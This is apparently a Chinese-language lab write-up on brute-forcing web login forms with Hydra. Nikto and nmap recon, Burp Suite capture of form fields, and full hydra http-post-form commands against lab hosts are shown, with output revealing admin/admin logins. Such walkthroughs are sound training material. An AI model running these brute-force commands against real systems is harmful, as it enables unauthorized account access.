Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
775 packages can be updated.
483 updates are security updates.
Last login: Sat Oct 29 16:20:08 2022 from 192.168.200.15
jason@Ubuntu14:~$ id
uid=1001(jason) gid=1001(jason) groups=1001(jason)
由上指令,可以發現就是一個不是root的使用者。
0x03 應用Hydra之HTTP表單密碼爆破
接下來是lab 2:
剛剛的掃描結果值得注意的點:
接下來用nikto,希望網站主動告訴我們它有哪些目錄:
┌──(kali㉿kali)-[~]
└─$ nikto -host http://172.16.1.142:8888
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.1.142
+ Target Hostname: 172.16.1.142
+ Target Port: 8888
+ Start Time: 2023-02-19 05:08:09 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 4.0.30319
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'content-style-type' found, with contents: text/css
+ Uncommon header 'content-script-type' found, with contents: text/javascript
+ Entry '/BlogEngine/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7918 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-02-19 05:08:25 (GMT-5) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
知道有一個/BlogEngine目錄,試著連連看:
點右上角三橫線後出現下圖,點登入:
點「登入」:
那麼,要如何讓程式自動填入上述表格,進行密碼爆破? 其實hydra有針對這樣表單的爆破方式,指令格式如下,而問題是下圖紅線處,是每個網站不一樣的。
為了知道要怎麼得到上圖綠框(1)、橘框(2)跟藍圈(3)相關資訊,請出burp suite:
使用burp suite之前,先要更改瀏覽器的proxy設定:
點上圖的settings:
點選上圖選項,另外再看看burp suite裡HTTP Proxy該填什麼:
填入:
之後隨便輸入錯誤的帳密後,再次回到BurpSuite,並點下圖綠框:
intercept的作用是可以攔截動作。實際上只點選網頁的某一個鍵時,就可能會經過好幾個網頁來處理使用者要求,而intercept就是可以強迫動作做完一步就停,按下下圖紅框Forward才能繼續下一個步驟:
一直Forward直到要求處理完成,再點一下Intercept on,讓它變off,不然無法檢視原始碼。
之後要找failed相關的訊息,要檢視原始碼,就是藍圈:
切回去到HTTP history看看剛剛經歷了什麼,而下圖Raw的反白處,就是綠色框框必填資訊。
再來是要填的第二個資訊(橘框),就是下圖反白處:
為了可以密碼爆破,所以__VIEWSTATE的內容要改一下。下圖是修改前跟修改後的比對,其實就是為了要可以填入字典檔的內容:
所以密碼爆破指令如下:
紅、藍、綠都是剛剛得到的資訊,以冒號分隔。
┌──(kali㉿kali)-[/usr/share/seclists/Passwords]
└─$ hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-password s-1000000.txt -s 8888 172.16.1.142 http-post-form "/BlogEngine/Account/login.asp x:__VIEWSTATE=1OEalh2S3ypsE3ovuOItZQXivyIzpx%2F0tDHRNN4jHESRHynwSXHWojkR2NUO9LHR TGl3y5jdi%2Bh1%2FVpMyKxXiBqha3US2RrvoOePJIOFuzPwMB3P%2Fl8HnLWZKWyW5SzQ9PBLSGUBRa %2FG7MzdT0Jl2LbKTcr1MqrIhTOEa5naAFer2QttldTakmyfvOYcqsnW%2BG%2BPs9ys7VRw3yFRSaTC Q9GYkw2HnQ9KpiWcYrNPYsYMC%2Bs6NYyNb7za2PSRf0993UVhu0DW6aIO%2B1nMtbKjgdegSSJtzIpI v43SVHqNGVWiSzKu8jkm2BRnsLlwK7Ar2cZYO2oInK9oRI8PuRJf43Jq2BsaDfIUU6m6JAHz8JUtxEFC &__VIEWSTATEGENERATOR=F75D4323&__EVENTVALIDATION=%2BqereblHfgZrY0yE4PFQIPiaMhEV1 olmszouJTCQDevS7lyGxoGnLsWgGKWtTuj4IFQilnvOEG%2FaT8n6dn2b40Pfq4oI5Zyf5CVSJnTaDzS oSxqbd0DWzOS4NQBwUOl0iYZ5P2jKwUk18B%2BLEq7LpTpbb59vwVrPGo751upJoA4%2FTKmN&ctl00% 24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Pa ssword=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in mi litary or secret service organizations, or for illegal purposes (this is non-bin ding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-19 06:19: 07
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1 000000), ~62500 tries per task
[DATA] attacking http-post-form://172.16.1.142:8888/BlogEngine/Account/login.asp x:__VIEWSTATE=1OEalh2S3ypsE3ovuOItZQXivyIzpx%2F0tDHRNN4jHESRHynwSXHWojkR2NUO9LHR TGl3y5jdi%2Bh1%2FVpMyKxXiBqha3US2RrvoOePJIOFuzPwMB3P%2Fl8HnLWZKWyW5SzQ9PBLSGUBRa %2FG7MzdT0Jl2LbKTcr1MqrIhTOEa5naAFer2QttldTakmyfvOYcqsnW%2BG%2BPs9ys7VRw3yFRSaTC Q9GYkw2HnQ9KpiWcYrNPYsYMC%2Bs6NYyNb7za2PSRf0993UVhu0DW6aIO%2B1nMtbKjgdegSSJtzIpI v43SVHqNGVWiSzKu8jkm2BRnsLlwK7Ar2cZYO2oInK9oRI8PuRJf43Jq2BsaDfIUU6m6JAHz8JUtxEFC &__VIEWSTATEGENERATOR=F75D4323&__EVENTVALIDATION=%2BqereblHfgZrY0yE4PFQIPiaMhEV1 olmszouJTCQDevS7lyGxoGnLsWgGKWtTuj4IFQilnvOEG%2FaT8n6dn2b40Pfq4oI5Zyf5CVSJnTaDzS oSxqbd0DWzOS4NQBwUOl0iYZ5P2jKwUk18B%2BLEq7LpTpbb59vwVrPGo751upJoA4%2FTKmN&ctl00% 24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Pa ssword=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[8888][http-post-form] host: 172.16.1.142 login: admin password: admin
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete u ntil end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-19 06:19: 32
可得知密碼一樣是admin。
首先設定好burp(開burp -> 瀏覽器設置proxy),再做下面步驟:
┌──(kali㉿kali)-[/usr/share/seclists/Passwords]
└─$ sudo nmap 172.16.1.153 -p-
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-19 06:43 EST
Nmap scan report for 172.16.1.153
Host is up (0.049s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 27.89 seconds
┌──(kali㉿kali)-[/usr/share/seclists/Passwords]
└─$ sudo nmap 172.16.1.153 -p 80 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-19 06:44 EST
Nmap scan report for 172.16.1.153
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Did not follow redirect to http://hr.itop.com.tw/app/login.php
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 3.16 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 4.0 (90%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 61.63 ms 192.168.200.1
2 11.39 ms 172.16.1.153
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.39 seconds
注意掃描結果有http://hr.itop.com.tw/app/login.php。
實際上卻連不到。有些公司是網頁會用內部DNS解析,所以這裡應該改一下DNS設定:
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts
加上第三行:
第三行是新增的。儲存修改後重連即可連上如下圖。
隨便打個錯的,觀察burp:
看burp:
看burp:
檢視該輸入帳密之網頁原始碼:
如此一來,可以得到為了爆破密碼,而需填入hydra的綠框、橘框跟藍圈:
┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt 172.16.1.153 http-post-form "/app/login.php:next=&csrf=d8d5b15bfc4d470dc4381ceca767d48fdbd33e3e&username=^USER^&password=^PASS^:Login failed"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-19 07:25:18
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking http-post-form://172.16.1.153:80/app/login.php:next=&csrf=d8d5b15bfc4d470dc4381ceca767d48fdbd33e3e&username=^USER^&password=^PASS^:Login failed
[80][http-post-form] host: 172.16.1.153 login: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-19 07:25:21
知道密碼是admin,成功登入:
